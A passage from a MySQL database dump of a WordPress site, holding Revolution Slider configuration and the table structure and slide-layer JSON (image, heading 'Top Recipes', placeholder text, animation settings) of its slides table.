center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#ffffff\",\"type\":\"0\"},\"position\":{\"marginTop\":0,\"marginBottom\":0,\"marginLeft\":0,\"marginRight\":0,\"align\":\"center\",\"fixedOnTop\":false,\"addClear\":false}},\"visibility\":{\"hideSelectedLayersUnderLimit\":0,\"hideAllLayersUnderLimit\":0,\"hideSliderUnderLimit\":0},\"general\":{\"slideshow\":{\"slideShow\":true,\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":0,\"stopAtSlide\":1,\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":{\"d\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"n\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"t\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"m\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"}},\"presetSliderHeight\":false,\"initDelay\":0,\"waitForInit\":false},\"progressbar\":{\"set\":false,\"height\":5,\"position\":\"bottom\",\"color\":\"rgba(255,255,255,0.5)\"},\"firstSlide\":{\"set\":false,\"duration\":300,\"slotAmount\":7,\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":1},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":50,\"height\":100},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":1,\"velocity\":75},\"keyboard\":{\"direction\":\"horizontal\",\"set\":false},\"mouse\":{\"set\":\"off\",\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"style\":\"1000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"left\":{\"anim\":\"fade\",\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":30,\"offsetY\":0,\"align\":\"slider\"},\"right\":{\"anim\":\"fade\",\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":30,\"offsetY\":0,\"align\":\"slider\"}},\"thumbs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"2000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":5,\"direction\":\"horizontal\",\"height\":50,\"width\":100,\"widthMin\":100,\"innerOuter\":\"inner\",\"offsetX\":0,\"offsetY\":20,\"space\":5,\"align\":\"slider\",\"padding\":5,\"wrapperColor\":\"transparent\"},\"tabs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"4000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":5,\"direction\":\"horizontal\",\"height\":50,\"width\":100,\"widthMin\":100,\"innerOuter\":\"inner\",\"offsetX\":0,\"offsetY\":20,\"space\":5,\"align\":\"slider\",\"padding\":5,\"wrapperColor\":\"transparent\"},\"bullets\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"3000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":0,\"offsetY\":20,\"align\":\"slider\",\"space\":5,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":0,\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[5,10,15,20,25,30,35,40,45,46,47,48,49,50,51,30],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":65},\"mouse\":{\"speed\":0,\"bgSpeed\":0,\"layersSpeed\":0,\"origo\":\"slidercenter\",\"type\":\"scroll\"}},\"modal\":{\"bodyclass\":\"\",\"horizontal\":\"center\",\"vertical\":\"middle\",\"cover\":true,\"coverColor\":\"rgba(0,0,0,0.5)\"},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"layers\":false,\"maxBlur\":10,\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":false,\"parallaxLayers\":false,\"staticLayers\":false,\"staticParallaxLayers\":false,\"tilt\":30},\"scrolltimeline\":{\"set\":false,\"fixed\":false,\"fixedStart\":2000,\"fixedEnd\":4000,\"layers\":false,\"ease\":\"Linear.easeNone\",\"speed\":500},\"skins\":{\"colorsAtStart\":false,\"cid\":2,\"colors\":[{\"alias\":\"Highlight\",\"v\":\"#ff0000\",\"ref\":[]},{\"alias\":\"Headline Text\",\"v\":\"#ffffff\",\"ref\":[]},{\"alias\":\"Content Text\",\"v\":\"#00ffff\",\"ref\":[]}]},\"modalshortcode\":\"[rev_slider usage=\\\"modal\\\" alias=\\\"slider-4\\\"][\\/rev_slider]\"}','{\"version\":\"6.1.8\"}',''); /*!40000 ALTER TABLE `wpvt_revslider_sliders_bkp` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_revslider_slides` -- DROP TABLE IF EXISTS `wpvt_revslider_slides`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_revslider_slides` ( `id` int(9) NOT NULL AUTO_INCREMENT, `slider_id` int(9) NOT NULL, `slide_order` int(11) NOT NULL, `params` longtext NOT NULL, `layers` longtext NOT NULL, `settings` text NOT NULL DEFAULT '', UNIQUE KEY `id` (`id`), KEY `slider_id_index` (`slider_id`) ) ENGINE=MyISAM AUTO_INCREMENT=43 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_revslider_slides` -- LOCK TABLES `wpvt_revslider_slides` WRITE; /*!40000 ALTER TABLE `wpvt_revslider_slides` DISABLE KEYS */; INSERT INTO `wpvt_revslider_slides` (`id`, `slider_id`, `slide_order`, `params`, `layers`, `settings`) VALUES (1,1,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"solid\",\"color\":\"#f7f7f7\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Image 1\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-cimet-img-71.png\",\"imageId\":4589},\"size\":{\"width\":{\"d\":{\"v\":\"186px\",\"e\":true},\"n\":{\"v\":\"148px\",\"e\":true},\"t\":{\"v\":\"202px\",\"e\":true},\"m\":{\"v\":\"94px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"394px\",\"e\":true},\"n\":{\"v\":\"313px\",\"e\":true},\"t\":{\"v\":\"428px\",\"e\":true},\"m\":{\"v\":\"198px\",\"e\":true}},\"originalWidth\":186,\"originalHeight\":394,\"aspectRatio\":{\"d\":{\"v\":0.4720812182741117},\"n\":{\"v\":0.4720812182741117},\"t\":{\"v\":0.4720812182741117},\"m\":{\"v\":0.4720812182741117}}},\"position\":{\"x\":{\"d\":{\"v\":\"-873px\",\"e\":true},\"n\":{\"v\":\"-50px\",\"e\":true},\"t\":{\"v\":\"-16px\",\"e\":true},\"m\":{\"v\":\"-25px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"76px\",\"e\":true},\"n\":{\"v\":\"190px\",\"e\":true},\"t\":{\"v\":\"255px\",\"e\":true},\"m\":{\"v\":\"235px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"FOR WORDPRESS\",\"alias\":\"FOR WORDPRESS\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-641px\",\"e\":true},\"n\":{\"v\":\"-520px\",\"e\":true},\"t\":{\"v\":\"66px\",\"e\":true},\"m\":{\"v\":\"40px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-387px\",\"e\":true},\"n\":{\"v\":\"-343px\",\"e\":true},\"t\":{\"v\":\"54px\",\"e\":true},\"m\":{\"v\":\"54px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\"},\"t\":{\"v\":\"#3c3c3c\"},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"14px\",\"e\":true},\"n\":{\"v\":\"14px\"},\"t\":{\"v\":\"14px\"},\"m\":{\"v\":\"14px\"}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"3px\"},\"t\":{\"v\":\"3px\"},\"m\":{\"v\":\"3px\"}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\"},\"t\":{\"v\":\"#3c3c3c\"},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"Top Recipes \",\"alias\":\"Top Recipes \",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-539px\",\"e\":true},\"n\":{\"v\":\"-420px\",\"e\":true},\"t\":{\"v\":\"64px\",\"e\":true},\"m\":{\"v\":\"38px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-331px\",\"e\":true},\"n\":{\"v\":\"-294px\",\"e\":true},\"t\":{\"v\":\"104px\",\"e\":true},\"m\":{\"v\":\"104px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#444444\",\"e\":true},\"n\":{\"v\":\"#444444\"},\"t\":{\"v\":\"#444444\"},\"m\":{\"v\":\"#444444\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"60px\",\"e\":true},\"n\":{\"v\":\"60px\"},\"t\":{\"v\":\"60px\"},\"m\":{\"v\":\"40px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\"},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"1px\"},\"t\":{\"v\":\"1px\"},\"m\":{\"v\":\"1px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#444444\",\"e\":true},\"n\":{\"v\":\"#444444\"},\"t\":{\"v\":\"#444444\"},\"m\":{\"v\":\"#444444\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"4\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its .\",\"alias\":\"It is a long establi...\",\"uid\":4,\"size\":{\"width\":{\"d\":{\"v\":\"418px\",\"e\":true},\"n\":{\"v\":\"418px\",\"e\":true},\"t\":{\"v\":\"418px\"},\"m\":{\"v\":\"243px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"67px\",\"e\":true},\"n\":{\"v\":\"67px\",\"e\":true},\"t\":{\"v\":\"67px\"},\"m\":{\"e\":true}},\"originalWidth\":\"418px\",\"originalHeight\":\"67px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-510px\",\"e\":true},\"n\":{\"v\":\"124px\",\"e\":true},\"t\":{\"v\":\"64px\",\"e\":true},\"m\":{\"v\":\"39px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-253px\",\"e\":true},\"n\":{\"v\":\"240px\",\"e\":true},\"t\":{\"v\":\"160px\",\"e\":true},\"m\":{\"v\":\"160px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"